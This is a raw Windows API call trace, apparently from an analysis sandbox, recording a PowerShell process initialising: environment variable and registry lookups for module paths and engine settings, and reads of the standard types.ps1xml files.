	[0345.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.802] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.803] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.803] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.803] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.803] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.804] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.804] CoTaskMemFree (pv=0x1b7a89f0) 
	[0345.807] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0345.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.807] CoTaskMemFree (pv=0x1b7a89f0) 
	[0346.095] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0346.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.095] CoTaskMemFree (pv=0x1b7a89f0) 
	[0346.099] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0346.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.099] CoTaskMemFree (pv=0x1b7a89f0) 
	[0346.099] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0346.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.100] CoTaskMemFree (pv=0x1b7a89f0) 
	[0347.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.903] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0347.903] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0347.903] CoTaskMemFree (pv=0x1b7a89f0) 
	[0347.904] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b90c0
	[0347.904] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7b90c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0347.904] CoTaskMemFree (pv=0x1b7b90c0) 
	[0347.904] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d488 | out: phkResult=0x10d488*=0x320) returned 0x0
	[0347.904] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d40c, lpData=0x0, lpcbData=0x10d408*=0x0 | out: lpType=0x10d40c*=0x2, lpData=0x0, lpcbData=0x10d408*=0x6c) returned 0x0
	[0347.905] CoTaskMemAlloc (cb=0x70) returned 0x3520f0
	[0347.905] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d3dc, lpData=0x3520f0, lpcbData=0x10d3d8*=0x6c | out: lpType=0x10d3dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x10d3d8*=0x6c) returned 0x0
	[0347.905] CoTaskMemFree (pv=0x3520f0) 
	[0347.905] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b90c0
	[0347.905] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7b90c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0347.905] CoTaskMemFree (pv=0x1b7b90c0) 
	[0347.905] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b90c0
	[0347.905] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7b90c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0347.905] CoTaskMemFree (pv=0x1b7b90c0) 
	[0347.908] RegCloseKey (hKey=0x320) returned 0x0
	[0347.908] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b90c0
	[0347.909] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7b90c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0347.909] CoTaskMemFree (pv=0x1b7b90c0) 
	[0347.909] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d488 | out: phkResult=0x10d488*=0x320) returned 0x0
	[0347.909] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10d40c, lpData=0x0, lpcbData=0x10d408*=0x0 | out: lpType=0x10d40c*=0x0, lpData=0x0, lpcbData=0x10d408*=0x0) returned 0x2
	[0347.909] RegCloseKey (hKey=0x320) returned 0x0
	[0347.913] CoTaskMemAlloc (cb=0x20c) returned 0x3a20f0
	[0347.913] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3a20f0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0347.915] CoTaskMemFree (pv=0x3a20f0) 
	[0347.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0347.916] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0347.926] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0347.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.926] CoTaskMemFree (pv=0x1b7a89f0) 
	[0347.928] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0347.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.928] CoTaskMemFree (pv=0x1b7a89f0) 
	[0347.932] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0347.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.932] CoTaskMemFree (pv=0x1b7a89f0) 
	[0347.932] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0347.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.932] CoTaskMemFree (pv=0x1b7a89f0) 
	[0347.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d278 | out: phkResult=0x10d278*=0x328) returned 0x0
	[0347.935] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x10d28c, lpData=0x0, lpcbData=0x10d288*=0x0 | out: lpType=0x10d28c*=0x1, lpData=0x0, lpcbData=0x10d288*=0x74) returned 0x0
	[0347.936] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x10d1fc, lpData=0x0, lpcbData=0x10d1f8*=0x0 | out: lpType=0x10d1fc*=0x1, lpData=0x0, lpcbData=0x10d1f8*=0x74) returned 0x0
	[0347.936] CoTaskMemAlloc (cb=0x78) returned 0x3520f0
	[0347.936] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x10d1cc, lpData=0x3520f0, lpcbData=0x10d1c8*=0x74 | out: lpType=0x10d1cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d1c8*=0x74) returned 0x0
	[0347.936] CoTaskMemFree (pv=0x3520f0) 
	[0347.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0348.227] SetErrorMode (uMode=0x1) returned 0x1
	[0348.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d150 | out: lpFileInformation=0x10d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0348.227] SetErrorMode (uMode=0x1) returned 0x1
	[0348.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0348.230] SetErrorMode (uMode=0x1) returned 0x1
	[0348.230] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d150 | out: lpFileInformation=0x10d150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0348.230] SetErrorMode (uMode=0x1) returned 0x1
	[0348.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0348.234] SetErrorMode (uMode=0x1) returned 0x1
	[0348.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d150 | out: lpFileInformation=0x10d150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0348.234] SetErrorMode (uMode=0x1) returned 0x1
	[0348.238] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0348.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.239] CoTaskMemFree (pv=0x1b7a89f0) 
	[0348.246] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0348.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.246] CoTaskMemFree (pv=0x1b7a89f0) 
	[0348.248] GetACP () returned 0x4e4
	[0348.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0348.256] SetErrorMode (uMode=0x1) returned 0x1
	[0348.257] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0348.258] GetFileType (hFile=0x32c) returned 0x1
	[0348.258] SetErrorMode (uMode=0x1) returned 0x1
	[0348.258] GetFileType (hFile=0x32c) returned 0x1
	[0348.262] ReadFile (in: hFile=0x32c, lpBuffer=0x2dfc1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2dfc1e8*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.265] ReadFile (in: hFile=0x32c, lpBuffer=0x2dfc1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2dfc1e8*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.266] ReadFile (in: hFile=0x32c, lpBuffer=0x2dfc1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2dfc1e8*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.266] ReadFile (in: hFile=0x32c, lpBuffer=0x2dfc1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2dfc1e8*, lpNumberOfBytesRead=0x10d088*=0xcf3, lpOverlapped=0x0) returned 1
	[0348.266] ReadFile (in: hFile=0x32c, lpBuffer=0x2dfb643, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2dfb643*, lpNumberOfBytesRead=0x10d088*=0x0, lpOverlapped=0x0) returned 1
	[0348.267] ReadFile (in: hFile=0x32c, lpBuffer=0x2dfc1e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2dfc1e8*, lpNumberOfBytesRead=0x10d088*=0x0, lpOverlapped=0x0) returned 1
	[0348.269] CloseHandle (hObject=0x32c) returned 1
	[0348.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0348.556] SetErrorMode (uMode=0x1) returned 0x1
	[0348.557] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0348.557] SetErrorMode (uMode=0x1) returned 0x1
	[0348.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0348.558] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x32c) returned 0x0
	[0348.558] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0
	[0348.558] CoTaskMemAlloc (cb=0x5a) returned 0x3cc8d0
	[0348.558] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x3cc8d0, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0
	[0348.558] CoTaskMemFree (pv=0x3cc8d0) 
	[0348.558] RegCloseKey (hKey=0x32c) returned 0x0
	[0348.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0348.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0348.589] GetSystemInfo (in: lpSystemInfo=0x10bd20 | out: lpSystemInfo=0x10bd20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0348.590] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0348.942] SetErrorMode (uMode=0x1) returned 0x1
	[0348.942] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0348.942] GetFileType (hFile=0x32c) returned 0x1
	[0348.942] SetErrorMode (uMode=0x1) returned 0x1
	[0348.942] GetFileType (hFile=0x32c) returned 0x1
	[0348.942] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.943] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.943] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.943] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
